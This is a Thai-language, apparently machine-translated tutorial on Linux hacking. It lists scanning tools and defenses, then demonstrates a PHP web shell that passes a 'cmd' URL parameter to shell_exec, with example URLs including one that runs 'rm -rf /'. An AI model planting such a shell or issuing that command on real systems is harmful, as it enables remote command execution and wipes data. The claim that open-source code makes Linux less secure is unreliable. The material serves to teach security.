การแฮ็กระบบปฏิบัติการ Linux: การแฮ็กด้วย Ubuntu (บทช่วยสอนคำสั่ง)

Linux เป็นระบบปฏิบัติการเซิร์ฟเวอร์ที่ใช้กันอย่างแพร่หลาย โดยเฉพาะอย่างยิ่งสำหรับเว็บเซิร์ฟเวอร์ Linux เป็นโอเพ่นซอร์ส ซึ่งหมายความว่าใครๆ ก็สามารถเข้าถึงโค้ดต้นฉบับได้ ซึ่งทำให้มีความปลอดภัยน้อยลงเมื่อเทียบกับระบบปฏิบัติการอื่น เนื่องจากผู้โจมตีสามารถศึกษาโค้ดต้นฉบับเพื่อค้นหาช่องโหว่ได้. ลินุกซ์ สำหรับแฮกเกอร์คือการใช้ประโยชน์จากช่องโหว่เหล่านี้เพื่อเข้าถึงระบบโดยไม่ได้รับอนุญาต

ในบทความนี้ เราจะแนะนำให้คุณรู้จักว่า Linux คืออะไร ช่องโหว่ด้านความปลอดภัย และการแฮ็กด้วย Ubuntu และมาตรการตอบโต้ที่คุณสามารถนำไปใช้ได้

หมายเหตุด่วนบน Linux

ลินุกซ์เป็นระบบปฏิบัติการโอเพ่นซอร์สระบบปฏิบัติการที่ใช้ Linux มีอยู่มากมาย เช่น Redhat, Fedora และ Ubuntu, ฯลฯ ต่างจากระบบปฏิบัติการอื่น Linux มีความปลอดภัยน้อยกว่าเมื่อเป็นเรื่องของความปลอดภัย นั่นเป็นเพราะซอร์สโค้ดนั้นเปิดให้ใช้งานได้ฟรี ดังนั้นจึงง่ายต่อการศึกษาช่องโหว่และใช้ประโยชน์จากช่องโหว่เหล่านั้นเมื่อเทียบกับระบบปฏิบัติการอื่นที่ไม่ใช่โอเพนซอร์ส Linux สามารถใช้เป็นระบบปฏิบัติการเซิร์ฟเวอร์ เดสก์ท็อป แท็บเล็ต หรืออุปกรณ์พกพาได้

โปรแกรม Linux สามารถใช้งานโดยใช้ GUI หรือคำสั่ง คำสั่ง Linux สำหรับ Kali Linux การแฮ็กมีประสิทธิภาพและประสิทธิผลมากกว่าเมื่อเทียบกับการใช้ GUI ด้วยเหตุนี้ การรู้คำสั่งพื้นฐานของ Linux สำหรับการแฮ็กจึงช่วยได้มาก

อ้างถึงบทช่วยสอนเหล่านี้ https://www.guru99.com/unix-linux-tutorial.html เกี่ยวกับวิธีการเริ่มต้นใช้งาน Kali Linux แฮ็ก

เครื่องมือแฮ็ก Linux

  • Nessus– สามารถใช้เครื่องมือนี้ได้ Ubuntu แฮ็ก การตั้งค่าการสแกน แพตช์ และเครือข่าย ฯลฯ สามารถพบได้ที่ https://www.tenable.com/products/nessus
  • Nแผนที่ เครื่องมือนี้สามารถใช้เพื่อตรวจสอบโฮสต์ที่ทำงานบนเซิร์ฟเวอร์และบริการที่พวกเขาใช้งานอยู่ นอกจากนี้ยังสามารถใช้เพื่อสแกนหาพอร์ตต่างๆ สามารถพบได้ที่ https://nmap.org/
  • ซาร่า – SARA เป็นตัวย่อสำหรับผู้ช่วยวิจัยของผู้ตรวจสอบความปลอดภัย ตามที่ชื่อบอกเป็นนัย เครื่องมือนี้สามารถใช้เพื่อตรวจสอบเครือข่ายจากภัยคุกคามต่างๆ เช่น ด้วย SQL Injection, XSS ฯลฯ สามารถดูได้ที่ http://www-arc.com/sara/sara.html

รายการข้างต้นยังไม่ครบถ้วนสมบูรณ์ มันช่วยให้คุณมีแนวคิดเกี่ยวกับเครื่องมือที่มีให้ Ubuntu การแฮ็กและแฮ็กระบบ Linux

วิธีป้องกันการแฮ็ก Linux

การแฮ็กระบบ Linux ใช้ประโยชน์จากช่องโหว่ในระบบปฏิบัติการ องค์กรสามารถใช้แนวทางต่อไปนี้เพื่อป้องกันตนเองจากการโจมตีดังกล่าว

  • การจัดการแพทช์– แพตช์แก้ไขข้อบกพร่องที่ผู้โจมตีใช้โจมตีระบบ นโยบายการจัดการแพตช์ที่ดีจะทำให้แน่ใจได้ว่าคุณจะนำแพตช์ที่เกี่ยวข้องไปใช้กับระบบของคุณอย่างต่อเนื่อง
  • การกำหนดค่าระบบปฏิบัติการที่เหมาะสม– ช่องโหว่อื่นๆ ใช้ประโยชน์จากจุดอ่อนในการกำหนดค่าเซิร์ฟเวอร์ ควรปิดใช้งานชื่อผู้ใช้และเดมอนที่ไม่ได้ใช้งาน การตั้งค่าเริ่มต้น เช่น รหัสผ่านทั่วไปสำหรับแอปพลิเคชัน ชื่อผู้ใช้เริ่มต้น และหมายเลขพอร์ตบางตัว ควรเปลี่ยน
  • ระบบตรวจจับการบุกรุก– เครื่องมือดังกล่าวสามารถใช้เพื่อตรวจจับการเข้าถึงระบบโดยไม่ได้รับอนุญาต เครื่องมือบางอย่างมีความสามารถในการตรวจจับและป้องกันการโจมตีดังกล่าว

กิจกรรมการแฮ็ก: แฮ็กก Ubuntu ระบบ Linux โดยใช้ PHP

ในสถานการณ์จริงนี้ เราจะได้เรียนรู้วิธีแฮ็กด้วย Ubuntu และเราจะให้ข้อมูลพื้นฐานเกี่ยวกับวิธีการใช้งานแก่คุณ PHP เพื่อประนีประนอมกับ Linux เราจะไม่มุ่งเป้าไปที่เหยื่อใดๆ หากคุณต้องการทดลองใช้งาน คุณสามารถติดตั้ง LAMPP บนเครื่องของคุณได้

PHP มาพร้อมกับสองฟังก์ชันที่สามารถใช้เพื่อรันคำสั่งแฮ็ก Linux มีฟังก์ชัน exec() และ shell_exec() ฟังก์ชัน exec() ส่งคืนบรรทัดสุดท้ายของเอาต์พุตคำสั่ง ในขณะที่ shell_exec() ส่งคืนผลลัพธ์ทั้งหมดของคำสั่งในรูปแบบสตริง

เพื่อวัตถุประสงค์ในการสาธิต สมมติว่าผู้โจมตีจัดการการอัปโหลดไฟล์ต่อไปนี้บนเว็บเซิร์ฟเวอร์

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

ที่นี่

สคริปต์ด้านบนได้รับคำสั่งจากตัวแปร GET ชื่อ cmd คำสั่งดำเนินการโดยใช้ shell_exec() และผลลัพธ์ที่ส่งคืนในเบราว์เซอร์

โค้ดด้านบนสามารถใช้ประโยชน์ได้โดยใช้ URL ต่อไปนี้

http://localhost/cp/konsole.php?cmd=ls%20-l

ที่นี่

  • “…konsole.php?cmd=ls%20-l”กำหนดค่า ls –l ให้กับตัวแปร cmd.

คำสั่งใน Ubuntu สำหรับการแฮ็คกับเซิร์ฟเวอร์จะถูกดำเนินการดังนี้

shell_exec('ls -l') ;

การดำเนินการโค้ดข้างต้นบนเว็บเซิร์ฟเวอร์จะให้ผลลัพธ์ที่คล้ายกับต่อไปนี้

แฮ็ค ก Ubuntu ระบบ Linux โดยใช้ PHP

คำสั่งดังกล่าวจะแสดงไฟล์ในไดเร็กทอรีปัจจุบันและการอนุญาต

สมมติว่าผู้โจมตีส่งคำสั่งต่อไปนี้

rm -rf /

ที่นี่

  • “rm” จะลบไฟล์
  • “rf” ทำให้คำสั่ง rm ทำงานในโหมดเรียกซ้ำ การลบโฟลเดอร์และไฟล์ทั้งหมด
  • “/” สั่งให้คำสั่งเริ่มการลบไฟล์ออกจากไดเร็กทอรีราก

URL การโจมตีจะมีลักษณะดังนี้

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

สรุป

  • Linux เป็นระบบปฏิบัติการยอดนิยมสำหรับเซิร์ฟเวอร์ เดสก์ท็อป แท็บเล็ต และอุปกรณ์พกพา
  • ลินุกซ์ เป็นโอเพ่นซอร์สและทุกคนสามารถรับซอร์สโค้ดได้ ทำให้ง่ายต่อการมองเห็นจุดอ่อน มันเป็นหนึ่งในระบบปฏิบัติการที่ดีที่สุดสำหรับแฮกเกอร์
  • คำสั่งแฮ็คพื้นฐานและเครือข่ายใน Ubuntu มีคุณค่าสำหรับแฮกเกอร์ Linux
  • ช่องโหว่เป็นจุดอ่อนที่สามารถนำไปใช้เพื่อประนีประนอมระบบได้
  • การรักษาความปลอดภัยที่ดีสามารถช่วยปกป้องระบบจากการถูกบุกรุกโดยผู้โจมตีได้